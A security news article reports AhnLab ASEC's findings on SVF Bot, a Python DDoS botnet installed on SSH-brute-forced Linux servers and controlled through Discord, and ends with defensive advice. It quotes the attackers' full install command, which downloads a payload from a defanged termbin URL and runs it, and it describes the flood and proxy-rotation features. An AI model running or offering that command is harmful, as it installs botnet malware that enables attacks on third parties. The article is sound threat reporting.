Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have identified a sophisticated campaign targeting poorly secured Linux servers through SSH brute force attacks, deploying a Python-based DDoS botnet called SVF Bot that leverages Discord as its command-and-control infrastructure.
Discord-Powered Botnet Architecture
The SVF Botnet represents a concerning evolution in DDoS attack methodology, utilizing legitimate platforms to evade detection.
Developed by the self-identified “SVF Team,” the malware is distributed as Python source code and establishes communication with threat actors through Discord servers using bot tokens for authentication.
Upon successful SSH compromise, attackers deploy the malware using a sophisticated installation command that creates a virtual Python environment and downloads necessary dependencies: python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5
The malware’s architecture includes a server grouping mechanism, allowing threat actors to organize infected machines into clusters for coordinated attacks.
When executed, SVF Bot sends server identification information via Discord webhooks, enabling operators to manage multiple compromised systems simultaneously.
Advanced DDoS Capabilities and Proxy Integration
SVF Bot’s technical sophistication extends to its DDoS attack capabilities, supporting both Layer 4 UDP floods and Layer 7 HTTP floods with advanced evasion techniques.
The malware includes comprehensive command functionality. $http, $customhttp, $udp, and $customudp commands for different attack vectors.
A particularly notable feature is the malware’s proxy integration system. Before launching HTTP flood attacks, SVF Bot scrapes proxy addresses from ten public sources, including sslproxies.org, free-proxy-list.net, and multiple GitHub repositories containing proxy lists.
The malware validates each proxy by attempting Google authentication before incorporating them into its attack infrastructure.
This proxy validation process ensures high-quality anonymization during attacks, making detection and attribution significantly more challenging for defenders.
During HTTP flood operations, the malware randomly selects validated proxies for each connection attempt, effectively distributing attack traffic across multiple IP addresses.
Security Implications and Defensive Measures
The SVF Botnet campaign highlights critical security gaps in Linux server management practices.
ASEC researchers emphasize that organizations must implement robust SSH security measures, including complex passwords, regular credential rotation, and system patching protocols.
Network administrators should deploy comprehensive firewall solutions to restrict unauthorized external access and maintain updated security software.
The malware’s exploitation of legitimate platforms, such as Discord, and public proxy services demonstrates the evolving sophistication of modern botnet operations, necessitating enhanced monitoring capabilities to detect anomalous network behavior patterns and unauthorized outbound connections to messaging platforms.
 have identified a sophisticated campaign){kind=link}